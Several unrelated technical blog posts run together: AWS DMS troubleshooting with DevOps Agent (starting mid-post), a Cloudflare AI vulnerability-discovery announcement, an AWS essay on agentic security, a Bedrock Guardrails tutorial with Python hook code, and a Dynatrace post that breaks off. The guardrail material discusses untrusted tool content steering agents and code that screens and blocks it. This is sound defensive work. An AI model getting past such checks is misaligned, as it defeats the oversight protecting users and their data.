The agent chose exactly the go/no-go gate tools: check_connection_health and validate_migration_data for the readiness signals, plus get_task_status, get_validation_failures, list_table_statistics, and analyze_cdc_latency to confirm the full picture. The connection-health tool waits for the real endpoint test result rather than reporting that a test merely started, and the validation tool confirms whether DMS actually compared source and target rows and found them equal, not just that the full load reached 100 percent. In our test runs the agent returned this go/no-go in under two minutes, against the fifteen to thirty minutes an operator typically spends cross-checking endpoint tests, task status, and per-table validation state by hand. (Illustrative from our runs, not a benchmark.)
Figure 1. The readiness check, showing endpoint health and validation state feeding a go/no-go assessment.
Migration: Investigate validation failures
To create a fault, we changed two rows directly on the Aurora target, bypassing DMS, which moved the customers and orders tables to the Mismatched records state.
Query
Our DMS migration to Aurora PostgreSQL (task dms-mcp-test-task in us-east-1, Aurora instance dms-mcp-test-target) is reporting data validation failures on some tables. Investigate the root cause and tell me how to fix it.
Response
The agent ran a deep investigation across 73 journal records, calling 11 of the registered tools (33 tool calls in total). It started with get_task_status, get_validation_failures, validate_migration_data, and list_table_statistics to establish which tables had diverged, then used search_task_logs, correlate_cloudtrail_changes, get_recent_task_events, analyze_cdc_latency, capture_aurora_performance, describe_endpoints, and get_premigration_assessment to build the timeline. It identified both affected tables and produced these findings:
Finding: CDC changes not applied to target before validator compared rows
Source modifications occurred on customers and orders at ~05:37:18 UTC.
The validator compared at 05:37:41 UTC, 23 seconds later, before CDC applied
them to Aurora. Evidence: CDC captured 17 source events but target id was 0
(no changes applied), and TARGET_APPLY logs showed "waiting for data from
upstream" through the window.
Finding: ValidationQueryCdcDelaySeconds set to 0 allows the validator to race
ahead of CDC replication.
That second finding is the difference between a dashboard and an investigation. The agent did not just report which tables failed. It named the exact DMS task setting (ValidationQueryCdcDelaySeconds) behind the transient failures and explained the mechanism, which is the fix an operator can act on. In our test runs the agent reached the ValidationQueryCdcDelaySeconds root cause in a single investigation of about three minutes, work that manually means correlating the failure table, CDC latency, CloudTrail, and task logs across four consoles, commonly thirty minutes or more. (Illustrative from our runs, not a benchmark.)
Figure 2. The DevOps Agent investigation for the validation failure, showing the tool timeline and the root-cause findings.
Migration: Assess replication latency
During ongoing replication, you want to know whether CDC is keeping up and where any delay sits.
Query
I want to understand the replication performance of our DMS task dms-mcp-test-task in us-east-1. Is the change data capture keeping up, and is the replication instance healthy or is it a bottleneck? Summarize the latency picture.
Response
The agent picked up the performance-specific tools: analyze_cdc_latency, check_replication_instance_health, and describe_replication_instance, with get_task_status and list_table_statistics for context. The latency tool compares source latency with target latency and returns an assessment, because the two together tell you where the delay sits. When source and target latency track each other, the bottleneck is the source side. When target latency runs well above source latency, the bottleneck is the target apply side. The instance-health tool flags CPU, memory, swap, and storage pressure that would make the instance itself the limit. In our test runs the latency assessment came back in roughly a minute, versus the manual path of pulling source and target CDC latency and instance metrics from CloudWatch and reasoning about which side leads. (Illustrative from our runs, not a benchmark.)
The latency tool also knows when it cannot answer. When the metric window is too sparse to separate source-side from target-side delay, it returns an insufficient_data verdict and asks for a longer window instead of forcing a conclusion from a handful of datapoints. This is deliberate: a confident but wrong root cause is worse than a request for more data. The agent surfaces that verdict to you rather than inventing a bottleneck, which is what makes its confident answers trustworthy when it does give them.
Figure 3. The replication latency assessment, comparing source and target CDC latency and instance health.
Migration: Run an open-ended investigation
Sometimes the operator does not know what is wrong yet. This is where the runbooks earn their place.
Query
Something seems off with our DMS migration (task dms-mcp-test-task, us-east-1, Aurora target dms-mcp-test-target) but I am not sure what. Investigate broadly, use any available runbooks that match what you find, and report the most important issue with how to fix it.
Response
Given no specific symptom, the agent ran the broadest investigation of the suite: 12 distinct tools across 43 records. It swept the task status, validation state, connectivity, latency, replication instance, endpoints, and logs, then called list_runbooks, recognized the validation symptom it had found, and fetched get_runbook for the matching runbook, which returned the full procedure. It produced a finding about a datatype or precision difference in the MySQL to PostgreSQL migration and followed the runbook to the recommended remediation. In our test runs this broad sweep of twelve tools resolved to a single prioritized finding in a few minutes, against the open-ended manual triage it replaces, which has no fixed time because the operator does not yet know where to look. (Illustrative from our runs, not a benchmark.)
Figure 4. The open-ended investigation, showing the agent browse the runbook catalog and follow the matching runbook.
Post-Migration: Review stabilization and monitoring
After cutover, the question shifts from “did the data move” to “is the new database healthy and watched.”
Query
We just cut over to Aurora PostgreSQL (instance dms-mcp-test-target) from a DMS migration (task dms-mcp-test-task, us-east-1). Assess the target database health now and tell me what monitoring or alarms are missing that we should add before production traffic ramps up.
Response
The agent selected the stabilization tool set: check_stabilization, capture_aurora_performance, summarize_task_health, get_validation_failures, and check_pending_maintenance. It read the Aurora target health (CPU, connections, read and write latency, buffer cache hit ratio, and the top Performance Insights wait event), then assessed what monitoring was missing for a database about to take production traffic. The point of this phase is the interpretation: a buffer cache hit ratio that stays low after warmup points to missing indexes, and a new database with no alarm on connection count or query latency is one bad query away from an unmonitored outage. In our test runs the stabilization review returned target health and the specific missing alarms in about two minutes, versus manually inspecting Aurora metrics and Performance Insights and then deciding which alarms a freshly promoted database still lacks. (Illustrative from our runs, not a benchmark.)
Figure 5. The post-cutover stabilization review, with target health and the monitoring gaps the agent flagged.
Improve the agent with Skills and runbooks
A finding like the ValidationQueryCdcDelaySeconds race condition should improve the next migration, not be relearned. The agent’s migration judgment is captured in two places. DevOps Agent Skills are Markdown instruction sets that load automatically when relevant and tell the agent when to call a tool and how to read its output. The runbooks are fetched on demand: the agent calls list_runbooks to browse the catalog, then get_runbook to pull the procedure that matches what it found, as it did in scenario 5. You can fold each new finding back into a skill or runbook, so the agent improves with every migration.
To make the flywheel concrete, here is the runbook the agent fetched in the open-ended investigation. When it found the validation symptom, it called get_runbook and received this procedure, authored from earlier findings and grounded in public AWS documentation:
---
id: validation-mismatched-records
title: "Validation: mismatched records on a table"
severity: HIGH
triggers:
- "ValidationState=Mismatched records"
- "ValidationFailedRecords>0"
tools:
- get_validation_failures
- list_table_statistics
- analyze_cdc_latency
- correlate_cloudtrail_changes
---
# Validation: mismatched records on a table
A table shows Mismatched records, meaning source and target rows differ.
The row-level diffs are recorded in the awsdms_validation_failures_v1
control table on the target.
## Phase 1 — Assess
- Run get_validation_failures to see which tables are in Mismatched records
and the failed-record counts.
- Run list_table_statistics to confirm the per-table validation state.
## Phase 2 — Investigate
- Query awsdms_validation_failures_v1 on the target for the failing rows/columns.
- Run analyze_cdc_latency: if validation runs during heavy CDC, transient
diffs can appear while changes are in flight.
- Run correlate_cloudtrail_changes to check for an out-of-band write or reload.
- Check for data-type, precision, timezone, or character-set differences.
## Phase 3 — Report
- State which tables diverged and by how many records.
- Name the most likely cause (type/precision, timezone, encoding, out-of-band write).
- Recommend revalidating the table after the cause is corrected.
## Remediation (operator action)
- Correct the underlying difference, then revalidate with validate-only.
> All steps use read-only MCP tools. Remediation actions are operator tasks
> and are not performed by the tools.
The judgment for when to apply a runbook lives in a DevOps Agent Skill, a Markdown instruction set that loads automatically when relevant. The data-validation skill, for example, encodes the rules the agent follows before it draws a conclusion:
# Skill: DMS Data Validation Assessment
## Critical Rules
- Every finding MUST cite actual numbers from the metrics report, never generalize.
- Do NOT fabricate or estimate any metric. If data is missing, say "Data not available."
- Do NOT hardcode thresholds, use relative comparisons (% of total, trend direction).
- Validation metrics come from TWO sources: the DMS table-statistics API AND
CloudWatch. Cross-reference both.
## Concepts to Evaluate — ValidationState machine
- Validated = healthy, all rows confirmed matching
- Mismatched records = ACTION REQUIRED, source/target differ, check failure table
- Suspended records = source churn too high, DMS cannot compare
- No primary key = CANNOT VALIDATE, table lacks a PK
Flag if Mismatched + Suspended + Error tables exceed 5% of the total.
Every new finding folds back into a runbook or a skill, so the next migration starts from what the last one learned. The ValidationQueryCdcDelaySeconds race condition from scenario 2 becomes a trigger the agent recognizes on sight, rather than something it has to rediscover.
When to use this approach
This pattern fits issue investigation, pre-cutover readiness gates, and post-cutover stabilization reviews, where an operator hands the agent a symptom and wants a grounded root cause from read-only tools. It is not a replacement for continuous monitoring or alarms, and it does not ship logs for long-term retention. Use it alongside your existing CloudWatch alarms and dashboards, not instead of them.
Clean up
To avoid ongoing charges, delete the resources you created. Delete the CloudFormation stack with aws cloudformation delete-stack --stack-name dms-mcp-test-mcp-server. Remove the MCP server from your Agent Space and deregister it. If you provisioned a test migration with the repository scripts, run the included cleanup script.
Conclusion
Migration issues usually stem from operational problems, not data problems, and AWS DMS does not catch them. In this post, you saw how to extend AWS DevOps Agent to investigate them autonomously, using a sample MCP server that exposes read-only, migration-specific tools and runbooks. Across five real investigations, the agent chose the right tools for each question, found the affected tables, named the exact task setting behind a validation race condition, and followed a runbook to a fix. Because the tools are read-only and access is least-privilege IAM, you can give them to an autonomous agent without widening your operational scope.
To get started, deploy the MCP server from the GitHub repository, register it with your Agent Space, and turn on DMS data validation before your next cutover.
About the authors
Chitresh Saxena Chitresh Saxena is a Senior AI/ML Specialist, specializing in generative AI solutions and dedicated to helping customers successfully adopt AI/ML on AWS. He excels at understanding customer needs and provides technical guidance to build, launch, and scale AI solutions that solve complex business problems.
Neel Sendas Neel Sendas is a Principal Technical Account Manager at AWS, leading Cloud Operations for some of AWS’s largest enterprise customers across ML governance, cloud finance, and operational resilience at scale. He is also a core member of AWS’s Machine Learning Technical Field Community, helping shape the roadmap for AWS AI/ML services.
Tipu Qureshi Tipu Qureshi is a Senior Principal Technologist in AWS Agentic AI, focusing on operational excellence and incident response automation. He works with AWS customers to design resilient, observable cloud applications and autonomous operational systems.
Your scanner just flagged 4,000 new vulnerabilities, 78 of them critical. Which one do you fix first?
To answer that question, Cloudflare is announcing early access to Vulnerability Discovery and Remediation, now part of Cloudflare Managed Defense. Vulnerability Discovery and Remediation is a new, invitation-only Cloudflare service that helps customers detect and mitigate vulnerabilities in their codebases.
Through the OpenAI Daybreak Defense Network, we use OpenAI Daybreak models, including GPT-5.6 Cyber, for reconnaissance, hunting, and validation against codebases that you authorize us to access. If we detect a vulnerability, we will then propose solutions to you, automatically checking each proposed patch and any accompanying proposed mitigation before presenting them for review. Importantly, you are in the driver’s seat: while we may propose code patches and other mitigations, you decide whether they are implemented.
Choosing what to fix first has always been hard. It's getting harder. Large language models can now surface weaknesses across a codebase in minutes, which means the number of findings keeps climbing. But the real problem is speed. Attackers can use AI to accelerate parts of vulnerability discovery and exploitation, giving security teams and developers less time to decide what matters and act on it.
Imagine that your scanner tells you there's a vulnerability in a handler. It doesn't tell you whether that code is deployed. It doesn't tell you whether anyone is actually hitting that route, what security activity surrounds it, or what controls you already have in place. You have to prioritize the finding without evidence of its production exposure or the protections already in place.
This is where we can help. With our global network, we can see which routes are active, how much traffic they carry, and what security events surround them. When customers enable Vulnerability Discovery and Remediation with Web Application Firewall (WAF), we can also see what rules are already applied and are actively blocking attacks. That context turns a generic finding into a specific priority: this vulnerability is in code that's live, on a route that's heavily used, with recent attack activity and no existing protection. And we can help you mitigate that vulnerability by proposing custom WAF mitigations and code patches tailored to your systems.
If this sounds familiar, it should. In “Build your own vulnerability harness”, we described the model-agnostic pipeline we use to scan Cloudflare's fleet, adversarially validate every finding, and turn raw model output into fixes engineers can trust. That internal system is one pillar of Vulnerability Discovery and Remediation. The harness gave us a way to find bugs at fleet scale. Vulnerability Discovery and Remediation brings that discovery process to the code the customer authorizes us to inspect, then connects the findings to production traffic, security events, and the edge controls that can act on them.
This diagram provides an overview of our process, which we explain in more detail below.
Adding context to a vulnerability harness
Our solution works across Cloudflare Workers and proxied applications. The process of detecting vulnerabilities begins with the collection of a traffic and security data snapshot from Web Assets and WAF. The snapshot shows which routes are active, how much traffic they receive, and whether recent security events are associated with them. For instance, a path exhibiting a high volume of detection triggers may also be considered critical for security context purposes. Web Assets and WAF itself serve as the first and second pillar of Vulnerability Discovery and Remediation respectively.
Next, we use source code vulnerability analysis to identify potential weaknesses in code. But that analysis does not show which routes reach it, how much traffic those routes receive, whether they receive suspicious requests, or which protections already apply. We treat routes carrying a high volume of requests as hot paths. Source code deployed to these routes undergoes stricter security profiling. Together, these signals provide evidence about how the API is used and where a vulnerability may be exposed.
For Workers, we retrieve the most recent source version of the Worker and its configured routes to identify the endpoints the Worker serves. Next, we match the Worker's routes to Web Assets and request metadata from Workers Observability, tying the exact source under review to the endpoints it handles in production. This collected network context stays available throughout the investigation, allowing agents to pull it when they need it.
Our vulnerability harness then starts up. It begins by using the Reconnaissance agent to map request paths to the parts of the codebase that handle them. Reconnaissance uses that map to send hunter agents into specific sections of the customer-authorized code, where they look for vulnerabilities and pull in relevant network context as needed. That context can help the hunter agents pay more attention to code behind an active or recently targeted route, but it does not establish that a vulnerability exists. Every vulnerability finding has to be corroborated by evidence in the source code.
Once the hunters return their findings, the validation stage checks the proposed mitigations before assigning each vulnerability an initial risk rating based on source code. The network evidence we collect can raise that rating further when, for example, the affected endpoint carries significant traffic or shows signs of active probing.
The result is a prioritized list of findings, each with a recommended code patch and, when the evidence supports it, a Cloudflare WAF Custom rule that can reduce exposure while the code fix is reviewed. If you have authorized our VDR to defend your zone, we will deploy the rules, scoped conservatively around the method, path, and other request details needed to reach the vulnerable code. If a route pattern contains only variables and wildcards, we do not suggest a rule. We would rather miss a possible connection than claim one the evidence cannot support.
The HTTP method override bypass example above shows how these signals work together. The harness maps the source finding to the production route, uses traffic and security activity to prioritize it, and scopes a proposed WAF rule around the requests that can reach the vulnerable code. That rule can reduce exposure while engineering reviews and ships the code patch.
Where the model runs
When you authorize an investigation, Vulnerability Discovery and Remediation runs the harness on Cloudflare and sends model prompts from Workers through Cloudflare AI Gateway to OpenAI Daybreak models on OpenAI's servers. GPT-5.6 Cyber is used during reconnaissance, hunting, and validation, and its responses return to the harness so the workflow can continue on Cloudflare. No model inference runs at Cloudflare's edge, and the model cannot apply any patch or rule it proposes.
We keep each investigation narrow by limiting it to the source code and evidence the customer authorizes. Before that context reaches the model, Vulnerability Discovery and Remediation removes what the investigation does not need and applies the redaction controls configured for the engagement. The harness treats source code, logs, and request metadata as evidence to inspect, rather than instructions to follow.
Tool access follows the same boundary: each call is logged and checked against the investigation's access policy before it runs, and every patch or rule proposal must pass checks implemented outside the model. If one of those checks fails, the workflow stops before the proposal reaches customer review.
Nothing is presented for review until it has cleared the checks and our team validates the output. For an edge-defense suggestion, that means validating the rule syntax and running it against synthetic fixtures that represent expected requests, rather than against customer traffic. If a check fails or the result remains ambiguous, we hold the output back and route it for diagnosis.
Passing those checks still does not change your environment. After validation by our team, Vulnerability Discovery and Remediation prepares the source code patch and WAF rule.
Join early access
Vulnerability Discovery and Remediation is available to selected customers by invitation during early access through our Managed Defense team. Each engagement starts with one application whose codebase the customer authorizes us to investigate. To connect the findings to production, Vulnerability Discovery and Remediation uses authorized read access to the Web Assets operation inventory, the relevant WAF controls, and Workers Trace Events Logpush where available. The investigation is semi-automated, but you review every result before deciding whether to test or deploy a change.
If you're interested in learning more, talk to your Cloudflare account team.
After talking with enterprise security leaders over the past year, one thing has become clear: the rise of autonomous AI agents is the most significant shift in security posture since the move to cloud. Organizations across every industry are adopting AI agents that authenticate on behalf of users, execute multistep workflows, and make decisions across infrastructure, often without waiting for human approval. Security operations need to keep pace.
At Amazon Web Services (AWS), we believe security should evolve ahead of AI adoption, not behind it. That belief drove our team to collaborate with the SANS Institute on a new chapter in the 2026 Cloud Security Exchange eBook, where we lay out a practical framework for securing agentic workloads at enterprise scale.
The challenge: Threats now move at machine speed
Traditional security was built for deterministic systems with predictable inputs and outputs. Agentic workloads break those assumptions. The same prompt can produce a compliant response on one request and a policy-violating response on the next. Agents adapt their behavior over time as they interact with users, data, and tools and operate with genuine autonomy: connecting to APIs, chaining actions together, and making independent decisions.
These properties mean that security controls designed for one-time assessments no longer suffice. Detection and response need to operate continuously and at machine speed.
What makes this urgent is the gap between adoption velocity and security maturity. Although 80% of organizations have adopted AI, only 10% govern it. Agents are being built by an expanding population of developers—including those using low-code tools—creating governance challenges that existing security programs must be extended to address.
Extending what already works
The good news, agentic security isn’t a blank slate. It builds on the same principles security teams already apply: identity governance, least privilege, defense in depth, and backup and recovery. What changes is how those principles are implemented when workloads are autonomous and probabilistic. In our eBook chapter, we cover four foundational areas:
Agent identity and governance: Every agent needs its own identity with temporary, scoped credentials rather than persistent, broad access. This extends zero trust principles to AI agents, where every request is authenticated and authorized independently, and every action has a traceable authorization chain. When a single agent combines access to sensitive data, the ability to communicate externally, and exposure to untrusted content, the risk profile changes significantly. Design patterns that prevent any single component from combining all three reduce that risk substantially.
Evolving detection for agentic workloads: Static, rule-based detection designed for human activity patterns can’t keep up with agent behavior. Organizations need continuous behavioral monitoring, living baselines that adapt as agents evolve, and instrumented observation that surfaces anomalies in real time. Amazon GuardDuty delivers this today, analyzing security signals continuously to detect threats as they emerge.
Response that balances speed with precision: When threats move at machine speed, response must be automated and tiered: some agent behaviors should be contained immediately, others require human judgment. The response framework we outline distinguishes between actions that can be automated safely and those that need escalation.
From single agents to multiagent ecosystems: Agents are already composing into teams, delegating subtasks, negotiating access, and coordinating across organizational boundaries. Each stage of this evolution inherits every security requirement that came before it, meaning organizations securing today’s basic chat agents are already laying the foundation for tomorrow’s multiagent ecosystems.
Security as an enabler of agentic AI adoption
The security leaders I speak with aren’t asking whether to adopt AI agents. They’re asking how to adopt them responsibly, at speed, and without slowing down the business.
AWS approaches this challenge by building security into the platform at every layer. Agentic AI built on AWS inherits nearly two decades of experience securing mission-critical workloads. Amazon GuardDuty, Amazon Inspector, and AWS Security Hub work together to provide continuous threat detection, vulnerability management, and unified security operations, all adapting to the unique characteristics of agentic workloads.
This isn’t about building new security from scratch. It’s about extending the security foundations your teams already trust into an environment where AI operates with increasing autonomy.
Read the full framework
Our chapter in the 2026 Cloud Security Exchange eBook goes deeper on each of these areas, with specific architectural patterns, implementation guidance, and frameworks for security teams at every stage of agentic AI maturity, whether you’re evaluating, piloting, or operating at scale.
You can learn more about AWS security services at AWS Cloud Security, or explore our AI Security Framework for a comprehensive view of how AWS secures AI workloads with the right controls, at the right layers, at the right phases.
If you have feedback about this post, submit comments in the Comments section below.
If you’re running AI agents in production, Amazon Bedrock Guardrails protects the model boundary. But your agents also invoke tools, fetch external data, and communicate with other systems. That data flows outside the model boundary, where model-level guardrails can’t reach.
You can extend guardrail coverage to those interactions using three validation checkpoints built with the Strands Agents SDK lifecycle hooks and Amazon Bedrock guardrails. You implement each checkpoint using a Strands life-cycle hook, which validates data at a critical trust boundary without changing your existing tools or agent logic.
Agents can communicate with other systems through the Model Context Protocol (MCP), a standard for connecting AI systems to data sources and tools. You will learn how to implement three validation checkpoints, scope different guardrails to specific tools, and scale them to other agents.
Extending guardrails beyond the model boundary
Amazon Bedrock Guardrails provides protection at the model boundary. Every model invocation is checked: the input prompt is validated before inference, and the model response is validated after inference. You can enforce guardrail use at the account level using AWS Identity and Access Management (IAM) policies, making guardrails mandatory for model calls across your account. You can further refine this by using Amazon Bedrock Guardrails input tagging to mark specific portions of the prompt for evaluation, so trusted content like system prompts can be skipped.
Guardrails cover what the model sees, but agents do more than call models. They invoke tools, pull data from external sources, communicate with MCP servers, and return results to users. These interactions happen outside the model boundary by design, because model-level guardrails focus on the prompts and responses the model itself handles. Adding validation at the tool boundary complements, rather than replaces, that model-level protection.
Model-level guardrails alone leave you exposed in four ways:
Tool parameters pass through unchecked. The model decides which tool to use and what parameters to pass. The agent then calls the tool with those parameters. No validation sits between the model’s decision and the tool’s execution. If the parameters inadvertently contain personally identifiable information (PII) or policy-violating content, the tool runs with that content.
External data enters without validation. Agents consume data from tool responses, MCP server outputs, and API calls. Without validation at the tool boundary, content from external sources can influence the agent’s behavior before model-level guardrails have a chance to evaluate it.
Misleading content can affect reasoning. An agent that retrieves inaccurate or misleading content from an external source might treat it as authoritative, producing skewed recommendations in lending, healthcare, or legal advice.
Multi-agent systems can spread bad data downstream. In multi-agent systems, a misconfigured or poorly designed upstream component can pass policy-violating content to downstream agents. Model-level guardrails at each agent’s boundary don’t inspect data flowing between agents at the tool layer.
Three validation checkpoints
To close these gaps, add three validation checkpoints at each trust boundary where data crosses into or out of your agent as shown in Figure 1.
Checkpoint 1: Inbound data validation – Check data before it reaches the model—user input, data from other agents, MCP tool servers, and RAG pipelines. You catch policy-violating or biased content before it enters the model’s context window. In the Strands Agents SDK, you implement this using a BeforeInvocationEvent hook that fires before model inference or tool execution occurs. The hook inspects incoming messages and blocks the request if the content violates policies. The model doesn’t see blocked content.
Checkpoint 2: Tool interaction supervision – Before the agent calls a tool, a BeforeToolCallEvent hook checks the parameters it’s about to pass. This is the gap model-level guardrails don’t cover. The model has already decided what to send, but nothing has verified whether that content is safe to act on. If the hook flags the input, the call is canceled before the real-world action occurs.
Checkpoint 3: Outbound data validation – Validate results before returning them to the user or passing them to downstream systems. You need this most for tools that ingest external content, like a web search tool fetching web pages from sites outside your control. In Strands, an AfterToolCallEvent hook validates the tool’s return value and replaces it with a block message if the content violates policies.
Figure 1: Three validation checkpoints extend Amazon Bedrock Guardrails from the model boundary to the tool boundary.
You can adjust the validation intensity of each checkpoint:
At Checkpoint 1, use a full Amazon Bedrock guardrail with PII detection, content filtering, and topic enforcement.
Checkpoint 2 can be lighter. Configure a separate Amazon Bedrock guardrail with rules tailored to the specific tool being called, or run local checks like regex validation or schema enforcement.
For Checkpoint 3, focus on unwanted content detection for tool outputs that return external data.
Mix fast deterministic checks (regex, schema validation, allowlists) with AI-based guardrail evaluations. This keeps latency low.
Implementation
The implementation uses boto3, the AWS SDK for Python, to call the ApplyGuardrail API. The Strands Agents SDK exposes one life-cycle event per checkpoint. Here’s how to implement each one.
The Strands Agents SDK installed: pip install strands-agents
AWS credentials configured with permissions for bedrock:ApplyGuardrail and bedrock:InvokeModel
Your guardrail ID and version from the AWS Management Console for Amazon Bedrock (navigate to Guardrails, select your guardrail, and copy the ID)
Create the guardrail validation hook
The GuardrailHook class is a Strands HookProvider. It registers three callbacks, one for each lifecycle event. When Strands triggers an event, the matching callback runs validate_inbound checks user messages, validate_input checks tool parameters before execution, and validate_output checks tool results. All three use the shared _check method, which calls the Amazon Bedrock ApplyGuardrail API.
Create a guardrail_hook.py file and add this implementation. Use the optional tool_names parameter to scope a hook to specific tools, or pass None to apply it everywhere:
import boto3
from strands.hooks import HookProvider, HookRegistry
from strands.hooks.events import (
BeforeInvocationEvent,
BeforeToolCallEvent,
AfterToolCallEvent,
)
class GuardrailHook(HookProvider):
def __init__(self, guardrail_id, guardrail_version, region_name, tool_names=None):
self.client = boto3.client("bedrock-runtime", region_name=region_name)
self.guardrail_id = guardrail_id
self.guardrail_version = guardrail_version
self.tool_names = tool_names # None = apply to all tools
def register_hooks(self, registry: HookRegistry, **kwargs):
registry.add_callback(BeforeInvocationEvent, self.validate_inbound)
registry.add_callback(BeforeToolCallEvent, self.validate_input)
registry.add_callback(AfterToolCallEvent, self.validate_output)
def _check(self, content, source="INPUT"):
"""Call Bedrock ApplyGuardrail. Returns True if content is safe."""
response = self.client.apply_guardrail(
guardrailIdentifier=self.guardrail_id,
guardrailVersion=self.guardrail_version,
source=source, # "INPUT" applies input policies; "OUTPUT" applies output policies
content=[{"text": {"text": content}}],
)
return response["action"] != "GUARDRAIL_INTERVENED"
# Checkpoint 1 — BeforeInvocationEvent
# Validates user input before model inference or tool execution occurs.
# The model does not see blocked content.
async def validate_inbound(self, event: BeforeInvocationEvent):
for msg in reversed(event.messages):
if msg.get("role") == "user":
for block in msg.get("content", []):
text = block.get("text", "")
if text and not self._check(text):
event.messages.clear()
event.messages.append({
"role": "user",
"content": [{"text": "Request blocked by safety guardrail."}],
})
return
break
# Checkpoint 2 — BeforeToolCallEvent
# Validates tool input parameters before the tool executes.
# Skips tools not in tool_names (if a filter is set).
async def validate_input(self, event: BeforeToolCallEvent):
if self.tool_names and event.tool_use.get("name") not in self.tool_names:
return
tool_input = event.tool_use.get("input", {})
for param_value in tool_input.values():
if isinstance(param_value, str) and not self._check(param_value):
event.cancel_tool = "This request was blocked by a safety guardrail."
return
# Checkpoint 3 — AfterToolCallEvent
# Validates tool output before it reaches the agent.
# Skips tools not in tool_names (if a filter is set).
async def validate_output(self, event: AfterToolCallEvent):
if self.tool_names and event.tool_use.get("name") not in self.tool_names:
return
content_parts = [
block["text"]
for block in event.result.get("content", [])
if "text" in block
]
content = "\n".join(content_parts)
if content and not self._check(content, source="OUTPUT"):
event.result = {
"toolUseId": event.result["toolUseId"],
"status": "error",
"content": [{"text": "Content blocked by safety guardrail."}],
}
Define tools
Strands discovers tools through the @tool decorator. The decorator turns a plain Python function into a tool the model can call, using the function’s docstring and type hints as the tool’s contract. Here are two simple examples used in the registration sections below. A web search tool and a customer data tool:
from strands import tool
@tool
def web_search(query: str) -> str:
"""Search the web and return a result snippet."""
# Replace with your actual search implementation
return f"Search results for: {query}"
@tool
def get_customer_data(customer_id: str) -> str:
"""Retrieve customer record by ID."""
# Replace with your actual data lookup implementation
return f"Customer record for: {customer_id}"
If you don’t have existing tools, create a tools.py file and copy in the example code above.
Register the hook
Strands activates hooks through the hooks parameter on the Agent constructor. After being registered, the hook’s callbacks run automatically on every matching lifecycle event. No changes are needed in your tools or agent logic. For a single guardrail applied to all tools, create one hook instance and pass it to your agent:
from strands import Agent
from strands.models import BedrockModel
from guardrail_hook import GuardrailHook
from tools import web_search, get_customer_data # Example tools - replace with your tools
# Example model and region selection
model = BedrockModel(
model_id="us.anthropic.claude-sonnet-4-5",
region_name="us-east-1",
)
guardrail_hook = GuardrailHook(
guardrail_id="your-guardrail-id", # Copy it from the Amazon Bedrock console > Guardrails
guardrail_version="1", # Use "DRAFT" for testing
region_name="us-east-1", # Region where the guardrails are defined
)
agent = Agent(
model=model,
tools=[web_search, get_customer_data], # Example tools
system_prompt="You are a helpful assistant.", # Example system prompt
hooks=[guardrail_hook], # Applied to all tool calls
)
Use different guardrails per tool
Different tools carry different risks. A web search tool fetches external content from untrusted sites and needs strict output filtering. A customer data tool returns internal records and might need PII detection configured differently. The tool_names parameter scopes a hook to specific tools. Strands still runs every registered hook on each event, but hooks skip the call when the tool name doesn’t match. Register one hook per guardrail:
from strands import Agent
from strands.models import BedrockModel
from guardrail_hook import GuardrailHook
from tools import web_search, get_customer_data # Example tools - replace with your tools
# Example model and region selection
model = BedrockModel(
model_id="us.anthropic.claude-sonnet-4-5",
region_name="us-east-1",
)
# Strict content filtering and PII detection for web search results
web_search_hook = GuardrailHook(
guardrail_id="gr-websearch-id", # Guardrail ID with content filtering + PII detection
guardrail_version="1", # Or set to DRAFT
region_name="us-east-1", # Change to your region
tool_names={"web_search"}, # Only applies to the web_search tool
)
# PII detection for customer data — prevents sensitive records from leaking into tool parameters
customer_data_hook = GuardrailHook(
guardrail_id="gr-customerdata-id", # Guardrail ID with PII detection
guardrail_version="1", # Or set to DRAFT
region_name="us-east-1", # Change to your region
tool_names={"get_customer_data"}, # Only applies to the get_customer_data tool
)
agent = Agent(
model=model,
tools=[web_search, get_customer_data], # Example tools
system_prompt="You are a helpful assistant.", # Example system prompt
hooks=[web_search_hook, customer_data_hook], # Each hook runs only for its assigned tools
)
Each guardrail is configured independently in the Amazon Bedrock console. You can match validation strictness to each tool’s risk level instead of applying one policy across your entire agent.
Test your implementation
Run a quick test with the preceding examples:
Create a project folder and add the following files:
guardrail_hook.py the GuardrailHook class
tools.py the web_search and get_customer_data tool definitions as examples
agent.py the agent setup from the Register the hook section
In agent.py, add a test prompt at the end:
# Send a test prompt
response = agent("Search the web for the latest news on AI security.")
print(response)
Update the guardrail IDs, AWS Region, and model ID in agent.py to match your configuration.
Run the agent from your project folder: python agent.py
The guardrail hook runs at each checkpoint. If the prompt or any tool output is flagged, you’ll see the block message in the response instead of the tool result.
Use the hook across your organization
The GuardrailHook is a standalone HookProvider. Build it once, then attach it to Strands agents by passing it to the hooks parameter. The same hook package can be published as an internal library and consumed by
Teams across an organization, with environment-specific guardrail IDs injected through configuration (for example, dev, staging, prod)
You can swap guardrail configurations or add checks like regex or schema validation without touching agent or tool code.
Conclusion
Amazon Bedrock Guardrails protects the model boundary, but agents also call tools, consume external data, and return results that never pass through model-level checks. The three validation checkpoints in this post close that gap using Strands Agents SDK lifecycle hooks: BeforeInvocationEvent validates user input, BeforeToolCallEvent validates tool parameters, and AfterToolCallEvent validates tool output. The same GuardrailHook class supports one shared guardrail or different guardrails scoped per tool, and deploys unchanged from local testing to Amazon Bedrock Agent Core Runtime.
This post was co-written with Michael Stephan, Senior Principal Product Manager, and Christian Kreuzberger, Principal Software Engineer, at Dynatrace.
AI-driven software delivery changes how code gets written, but not what production demands of it. A generated change still has to fit the traffic your service receives, the dependencies it calls, and the capacity limits it runs within. Without that context, you validate the change after it ships, which adds rework and deployment risk.
Kiro turns intent into specifications, code, and pull requests. AWS DevOps Agent investigates incidents and proposes mitigations. Bluebox by Dynatrace supplies the runtime topology, dependency, and traffic data that both draw on, so each change and each investigation is grounded in how the system behaves rather than how it’s expected to behave. In this post, we will follow a travel-booking example from feature design through post-deployment remediation. You’ll see how telemetry from Bluebox shapes a change in Kiro, how AWS DevOps Agent investigates an incident, and where human review and existing CI/CD controls remain in the process.
What are Kiro and AWS DevOps Agent?
Kiro is an agentic development environment that applies AI across the software development lifecycle. Its spec-driven workflow organizes a feature request into requirements, design, and implementation tasks before generating any code.
AWS DevOps Agent is a frontier agent for software delivery and operations across AWS, multicloud, and on-premises environments. It investigates incidents, identifies likely root causes, and recommends mitigations. Its release management capability (Preview) reviews code for release readiness and runs release tests before deployment.
Bluebox by Dynatrace: Helps agents ship the code you trust to production
To close the loop between code generation and production context, Kiro and AWS DevOps Agent rely on real-time production intelligence. This is where Bluebox by Dynatrace fits in. Bluebox provides the observability foundation that detects problems, measures their impact, and surfaces the runtime application topology, service dependencies, and actual traffic patterns that make AI-generated code and autonomous investigations truly production-aware.
